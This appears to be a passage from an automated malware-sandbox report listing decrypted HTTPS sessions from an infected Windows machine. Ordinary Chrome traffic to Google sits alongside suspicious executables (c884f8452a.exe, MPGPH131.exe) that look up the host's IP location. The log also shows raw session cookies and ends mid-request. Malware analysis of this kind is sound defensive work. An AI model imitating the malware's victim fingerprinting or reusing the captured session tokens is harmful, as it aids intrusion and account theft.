                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:17 GMT
                                                                                                                                                                                                                                      Location: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      Report-To: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]}
                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="youtube_main"
                                                                                                                                                                                                                                      Origin-Trial: AmhMBR6zCLzDDxpW+HfpP67BqwIknWnyMOXOQGfzYswFmJe+fgaI6XZgAzcxOrzNtP7hEDsOo1jdjFnVr2IdxQ4AAAB4eyJvcmlnaW4iOiJodHRwczovL3lvdXR1YmUuY29tOjQ0MyIsImZlYXR1cmUiOiJXZWJWaWV3WFJlcXVlc3RlZFdpdGhEZXByZWNhdGlvbiIsImV4cGlyeSI6MTc1ODA2NzE5OSwiaXNTdWJkb21haW4iOnRydWV9
                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                      Vary: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                      P3P: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657?hl=en for more info."
                                                                                                                                                                                                                                      Server: ESF
                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                      Set-Cookie: GPS=1; Domain=.youtube.com; Expires=Fri, 19-Apr-2024 01:59:17 GMT; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                      Set-Cookie: YSC=jRQWsnrOSN4; Domain=.youtube.com; Path=/; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                      Set-Cookie: VISITOR_INFO1_LIVE=uxbWyiEqJyc; Domain=.youtube.com; Expires=Wed, 16-Oct-2024 01:29:17 GMT; Path=/; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                      Set-Cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgJw%3D%3D; Domain=.youtube.com; Expires=Wed, 16-Oct-2024 01:29:17 GMT; Path=/; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49753 | 108.177.122.101 | 443 | 2956 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:29:22 UTC | 1347 | OUT | GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=480920124&timestamp=1713490161736 HTTP/1.1
                                                                                                                                                                                                                                      Host: accounts.youtube.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                      sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                      sec-ch-ua-model: ""
                                                                                                                                                                                                                                      sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                      sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                      X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                                                                                                                      Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                      Referer: https://accounts.google.com/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: YSC=jRQWsnrOSN4; VISITOR_INFO1_LIVE=uxbWyiEqJyc; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgJw%3D%3D
2024-04-19 01:29:22 UTC | 1850 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                      X-Frame-Options: ALLOW-FROM https://accounts.google.com
                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors https://accounts.google.com
                                                                                                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/AccountsDomainCookiesCheckConnectionHttp/cspreport
                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-FKHODHBz1iKQ6GXZWIj_Nw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/AccountsDomainCookiesCheckConnectionHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/AccountsDomainCookiesCheckConnectionHttp/cspreport/allowlist
                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:22 GMT
                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                      reporting-endpoints: default="/_/AccountsDomainCookiesCheckConnectionHttp/web-reports?context=eJzjUtDikmJw15BikPj6kkkLiJ3SZ7CGAHHSv_OsJUAsxMPxaWL7RjaBhr-_fjABAHiAEoQ"
                                                                                                                                                                                                                                      Server: ESF
                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Transfer-Encoding: chunked


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      4 | 192.168.2.5 | 49742 | 142.250.9.99 | 443 | 2956 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      2024-04-19 01:29:24 UTC | 1025 | OUT | GET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                      sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                      sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                      sec-ch-ua-model: ""
                                                                                                                                                                                                                                      sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                      X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                      Referer: https://accounts.google.com/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2024-04-19 01:29:24 UTC | 707 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"
                                                                                                                                                                                                                                      Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
                                                                                                                                                                                                                                      Content-Length: 5430
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Server: sffe
                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                      Date: Fri, 12 Apr 2024 15:00:22 GMT
                                                                                                                                                                                                                                      Expires: Sat, 20 Apr 2024 15:00:22 GMT
                                                                                                                                                                                                                                      Cache-Control: public, max-age=691200
                                                                                                                                                                                                                                      Age: 556142
                                                                                                                                                                                                                                      Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT
                                                                                                                                                                                                                                      Content-Type: image/x-icon
                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49766 | 34.117.186.192 | 443 | 5596 | C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:29:25 UTC | 237 | OUT | GET /widget/demo/81.181.57.52 HTTP/1.1
Connection: Keep-Alive
Referer: https://ipinfo.io/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: ipinfo.io
2024-04-19 01:29:25 UTC | 513 | IN | HTTP/1.1 200 OK
server: nginx/1.24.0
date: Fri, 19 Apr 2024 01:29:25 GMT
content-type: application/json; charset=utf-8
Content-Length: 980
access-control-allow-origin: *
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
referrer-policy: strict-origin-when-cross-origin
x-envoy-upstream-service-time: 2
via: 1.1 google
strict-transport-security: max-age=2592000; includeSubDomains
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-04-19 01:29:25 UTC | 742 | IN
Data Ascii: { "input": "81.181.57.52", "data": { "ip": "81.181.57.52", "city": "Atlanta", "region": "Georgia", "country": "US", "loc": "33.7490,-84.3880", "org": "AS212238 Datacamp Limited", "postal": "30302", "timezone": "America/
2024-04-19 01:29:25 UTC | 238 | IN
Data Ascii: address": "Averescu Maresal 8-10, Bucharest, Romania", "country": "RO", "email": "abuse-binbox@rnc.ro", "name": "Abuse contact role object", "network": "81.181.48.0/20", "phone": "+40 378 600 000" } }}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49767 | 104.26.5.15 | 443 | 5596 | C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:29:25 UTC | 261 | OUT | GET /demo/home.php?s=81.181.57.52 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: db-ip.com
2024-04-19 01:29:25 UTC | 658 | IN | HTTP/1.1 200 OK
Date: Fri, 19 Apr 2024 01:29:25 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: close
x-iplb-request-id: AC471F14:8F6A_93878F2E:0050_6621C8F5_8C5CE11:7B63
x-iplb-instance: 59128
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=40EZI3UxYuLiq8VL6%2Bes3Q%2BM%2B0dTqMTPs8i1QNBSN6UaMNLsSehMQfcWAPW9buJ6v%2BmHOoXAcvcN7VvvUYt2gADGV0Q7PnE8rY8MMscZ97Jq4qtvDGlGwl%2FrcA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87691fa03f16ad6e-ATL
alt-svc: h3=":443"; ma=86400
2024-04-19 01:29:25 UTC | 85 | IN
Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
2024-04-19 01:29:25 UTC | 5 | IN
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49776 | 34.117.186.192 | 443 | 4012 | C:\ProgramData\MPGPH131\MPGPH131.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:29:30 UTC | 237 | OUT | GET /widget/demo/81.181.57.52 HTTP/1.1
Connection: Keep-Alive
Referer: https://ipinfo.io/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: ipinfo.io
2024-04-19 01:29:31 UTC | 513 | IN | HTTP/1.1 200 OK
server: nginx/1.24.0
date: Fri, 19 Apr 2024 01:29:30 GMT
content-type: application/json; charset=utf-8
Content-Length: 980
access-control-allow-origin: *
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
referrer-policy: strict-origin-when-cross-origin
x-envoy-upstream-service-time: 2
via: 1.1 google
strict-transport-security: max-age=2592000; includeSubDomains
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-04-19 01:29:31 UTC | 742 | IN
Data Ascii: { "input": "81.181.57.52", "data": { "ip": "81.181.57.52", "city": "Atlanta", "region": "Georgia", "country": "US", "loc": "33.7490,-84.3880", "org": "AS212238 Datacamp Limited", "postal": "30302", "timezone": "America/
2024-04-19 01:29:31 UTC | 238 | IN
Data Ascii: address": "Averescu Maresal 8-10, Bucharest, Romania", "country": "RO", "email": "abuse-binbox@rnc.ro", "name": "Abuse contact role object", "network": "81.181.48.0/20", "phone": "+40 378 600 000" } }}


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      8192.168.2.54977734.117.186.1924433436C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:30 UTC237OUTGET /widget/demo/81.181.57.52 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Referer: https://ipinfo.io/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: ipinfo.io
                                                                                                                                                                                                                                      2024-04-19 01:29:31 UTC513INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.24.0
                                                                                                                                                                                                                                      date: Fri, 19 Apr 2024 01:29:31 GMT
                                                                                                                                                                                                                                      content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                      Content-Length: 980
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                      x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-envoy-upstream-service-time: 2
                                                                                                                                                                                                                                      via: 1.1 google
                                                                                                                                                                                                                                      strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Connection: close
2024-04-19 01:29:31 UTC | 742 | IN | Data Ascii: { "input": "81.181.57.52", "data": { "ip": "81.181.57.52", "city": "Atlanta", "region": "Georgia", "country": "US", "loc": "33.7490,-84.3880", "org": "AS212238 Datacamp Limited", "postal": "30302", "timezone": "America/
2024-04-19 01:29:31 UTC | 238 | IN | Data Ascii: address": "Averescu Maresal 8-10, Bucharest, Romania", "country": "RO", "email": "abuse-binbox@rnc.ro", "name": "Abuse contact role object", "network": "81.181.48.0/20", "phone": "+40 378 600 000" } }}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49780 | 104.26.5.15 | 443 | 4012 | C:\ProgramData\MPGPH131\MPGPH131.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:29:31 UTC | 261 | OUT | GET /demo/home.php?s=81.181.57.52 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: db-ip.com
2024-04-19 01:29:31 UTC | 656 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:31 GMT
                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      x-iplb-request-id: AC454677:A6C4_93878F2E:0050_6621C8FB_8C5CEC0:7B63
                                                                                                                                                                                                                                      x-iplb-instance: 59128
                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=43QWkFA%2F3Av16BFGdAX3o4zJ%2Br7piyKLQ4Gxj488FcJNpbLaCJCq6lVq21O8%2BqR24jPMMJsgAf0ksmz06Q4zifVi2tOT%2BtB2N2jhcsKZlKt7gQlTA1imUEk1PA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 87691fc37bb66737-ATL
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
2024-04-19 01:29:31 UTC | 85 | IN | Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
2024-04-19 01:29:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49782 | 104.26.5.15 | 443 | 3436 | C:\ProgramData\MPGPH131\MPGPH131.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:29:31 UTC | 261 | OUT | GET /demo/home.php?s=81.181.57.52 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: db-ip.com
2024-04-19 01:29:31 UTC | 652 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:31 GMT
                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      x-iplb-request-id: AC471E7B:AE72_93878F2E:0050_6621C8FB_8C855AD:4F34
                                                                                                                                                                                                                                      x-iplb-instance: 59215
                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BBfRY8SqAOTYOvaEvDvIiqVAgXOKIBXwzk64bfoyNN1uD6GUSCCTo%2Fab7iHZZbBGAHmICgCRFdPI1b6uns7ehItwpjbOEezlzD4JsMkP09qiCGhAohmqQHubSA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 87691fc40b5a53ee-ATL
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
2024-04-19 01:29:31 UTC | 85 | IN | Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
2024-04-19 01:29:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49789 | 74.125.138.101 | 443 | 7292 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:29:32 UTC | 549 | OUT | OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                                                                                                                                      Host: play.google.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Access-Control-Request-Method: POST
                                                                                                                                                                                                                                      Access-Control-Request-Headers: x-goog-authuser
                                                                                                                                                                                                                                      Origin: https://accounts.google.com
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Referer: https://accounts.google.com/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
2024-04-19 01:29:32 UTC | 520 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://accounts.google.com
                                                                                                                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                      Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                      Access-Control-Allow-Headers: X-Playlog-Web,authorization,origin,x-goog-authuser
                                                                                                                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:32 GMT
                                                                                                                                                                                                                                      Server: Playlog
                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49791 | 74.125.138.101 | 443 | 7292 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:29:32 UTC | 1298 | OUT | POST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                                                                                                                                      Host: play.google.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Content-Length: 927
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                      sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                      X-Goog-AuthUser: 0
                                                                                                                                                                                                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                      sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                      sec-ch-ua-model: ""
                                                                                                                                                                                                                                      sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Origin: https://accounts.google.com
                                                                                                                                                                                                                                      X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Referer: https://accounts.google.com/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: NID=513=DL6Us8jAPrwCCKarlTw2RsBHsg-PZZE0_IVMLOmld8Vg4EMZhTyE_65f9B0OK-p44_4Uk-puC2a1J_sCfoJnyAtSeJNyRbiKB8AiKkQJAbADm2J1hujbY6LjrFBfHJLMH2_5Lm7sfqr7tbq8PbRvtYkxosEGP0PKBUVLfjHGngA
2024-04-19 01:29:32 UTC | 927 | OUT
